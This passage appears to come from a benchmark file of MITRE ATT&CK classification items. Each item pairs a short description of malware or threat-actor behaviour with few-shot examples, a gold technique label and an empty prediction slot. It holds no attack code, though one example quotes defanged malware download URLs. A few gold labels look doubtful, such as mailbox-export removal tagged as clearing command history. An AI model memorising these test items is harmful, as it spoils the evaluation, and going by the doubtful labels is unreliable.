Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carberp has searched the Image File Execution Options registry key for \"Debugger\" within every subkey.\n\t - T1012: Query Registry\n- Text: The crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: clears event logs.\n\t - T1070: Indicator Removal\n", + "input": "Stuxnet searches the Registry for indicators of security programs.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gathers the Mac address, IP address, and the network adapter information from the victim\u2019s machine.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n- Text: The tool was primarily used by the attackers to move laterally on the victim\u2019s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Brave Prince gathers network configuration information as well as the ARP cache.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic\n\t - T1029: Scheduled Transfer\n- Text: Agent.btz attempts to download an encrypted binary from a specified domain.\n\t - T1105: Ingress Tool Transfer\n- Text: uses a large list of C2 servers that it cycles through until a successful connection is established.\n\t - T1008: Fallback Channels\n", + "input": "Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.", + "gold": "- T1029: Scheduled Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.\n\t - T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n- Text: ftp may be used to exfiltrate data separate from the main command and control protocol.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Clambling can send files from a victim's machine to Dropbox.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "Rclone can exfiltrate data over SFTP or HTTPS via WebDAV.", + "gold": "- T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Waterbear can use thread injection to inject shellcode into the process of security software.\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n- Text: Pteranodon can use a dynamic Windows hashing algorithm to map API components.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "LitePower can use various API calls.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains a command to collect information about anti-virus software on the victim.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution.\n\t - T1057: Process Discovery\n- Text: WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Bumblebee can identify specific analytical tools based on running processes.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: mailsearcher32 module This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users\n\t - T1083: File and Directory Discovery\n\t - T1087.003: Account Discovery - Email Account\n- Text: No matching sample found for T1548.001\n- Text: Enumerates remote open SMB network shares\n\t - T1135: Network Share Discovery\n", + "input": "Kinsing has used the find command to search for specific files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: RTM can scan victim drives to look for specific banking software on the machine to determine next actions.\n\t - T1518: Software Discovery\n", + "input": "Ursnif has used Reg to query the Registry for installed programs.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crutch can use Dropbox to receive commands and upload stolen data.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: RainyDay can use TCP in C2 communications.\n\t - T1095: Non-Application Layer Protocol\n- Text: Machete uses HTTP for Command & Control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "GLOOXMAIL communicates to servers operated by Google using the Jabber/XMPP protocol.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa exfiltrates data from a supplied path over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1020: Automated Exfiltration\n- Text: USBStealer exfiltrates collected files via removable media from air-gapped victims.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "MobileOrder exfiltrates data collected from the victim mobile device.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: LockerGoga has been observed deleting its original launcher after execution.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.\n\t - T1222.001: File and Directory Permissions Modification - Windows File and Directory Permissions Modification\n", + "input": "POWERSTATS can delete all files on the C:\\, D:\\, E:\\ and, F:\\ drives using PowerShell Remove-Item commands.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM has created user accounts and added them to local Admin groups.\n\t - T1136.001: Create Account - Local Account\n- Text: is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.\n\t - T1098: Account Manipulation\n- Text: The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account\n\t - T1078: Valid Accounts\n\t - T1136.002: Create Account - Domain Account\n", + "input": "Dragonfly has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.", + "gold": "- T1136.001: Create Account - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.\n\t - T1090: Proxy\n- Text: proxy-servers, web-servers, or software update servers. After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic\n\t - T1090.001: Proxy - Internal Proxy\n- Text: The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another\u2019s process token just for the execution of a command\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n", + "input": "Turla RPC backdoors have included local UPnP RPC proxies.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TeamTNT has disabled \"iptables\".\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "CookieMiner has checked for the presence of \"Little Snitch\", macOS network monitoring and application firewall software, stopping and exiting if it is found.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery\n- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can function as a proxy to create a serve that relays communication between the client and C&C server.\n\t - T1090: Proxy\n- Text: By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization\u2019s corporate and restricted segments\n\t - T1090.001: Proxy - Internal Proxy\n- Text: communicates via ICMP for C2.\n\t - T1095: Non-Application Layer Protocol\n", + "input": "jRAT can serve as a SOCKS proxy server.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has conducted targeted surveillance against activists and bloggers.\n\t - T1589: Gather Victim Identity Information\n- Text: The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails\n\t - T1586.002: Compromise Accounts - Email Accounts\n- Text: The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.\n\t - T1584.001: Compromise Infrastructure - Domains\n\t - T1583.001: Acquire Infrastructure - Domains\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1588.001: Obtain Capabilities - Malware\n", + "input": "Magic Hound has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.", + "gold": "- T1589: Gather Victim Identity Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once executed, Vcrodat loads an encrypted payload on to the victim\u2019s computer.\n\t - T1027: Obfuscated Files or Information\n- Text: 1) The malicious .rtf file exploits CVE-2017-11882. 3) The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt. 4) b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "APIs and strings in some TYPEFRAME variants are RC4 encrypted. Another variant is encoded with XOR.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: STARWHALE has the ability to hex-encode collected data from an infected host.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration\n\t - T1132: Data Encoding\n", + "input": "SUNBURST used Base64 encoding in its C2 traffic.", + "gold": "- T1132.001: Data Encoding - Standard Encoding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n- Text: Woburn, MA \u2013 May 7, 2018 \u2013 Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelg\u00e4nging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox\n\t - T1027: Obfuscated Files or Information\n- Text: The export called \u201cSendDataToServer_2\u201d does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Torisma has used XOR and Base64 to decode C2 data.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can encode files containing information about the targeted system.\n\t - T1027: Obfuscated Files or Information\n- Text: Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Avenger can extract backdoor malware from downloaded images.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", + "input": "The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Winnti for Linux has used HTTP in outbound communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n\t - T1132.001: Data Encoding - Standard Encoding\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "down_new has the ability to use HTTP in C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of \u201cTeamviewer\u201d strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe\n\t - T1219: Remote Access Software\n- Text: Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1078: Valid Accounts\n- Text: APT-C-36 obtained and used a modified variant of Imminent Monitor.\n\t - T1588.002: Obtain Capabilities - Tool\n", + "input": "Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SpeakUp deletes files to remove evidence on the machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Magic Hound has removed mailbox export requests from compromised Exchange servers.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", + "input": "APT41 deleted files from the system.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can capture screenshots.\n\t - T1113: Screen Capture\n- Text: Melcoz can monitor content saved to the clipboard.\n\t - T1115: Clipboard Data\n- Text: An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1204.002: User Execution - Malicious File\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain information about the victim's IP address.\n\t - T1016: System Network Configuration Discovery\n- Text: Crimson can identify the geographical location of a victim host.\n\t - T1614: System Location Discovery\n- Text: No matching sample found for T1557.002\n", + "input": "Saint Bot can collect the IP address of a victim machine.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1546.005\n- Text: FunnyDream can use `cmd.exe` for execution on remote hosts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "A module in CozyCar allows arbitrary commands to be executed by invoking \"C:\\Windows\\System32\\cmd.exe\".", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their 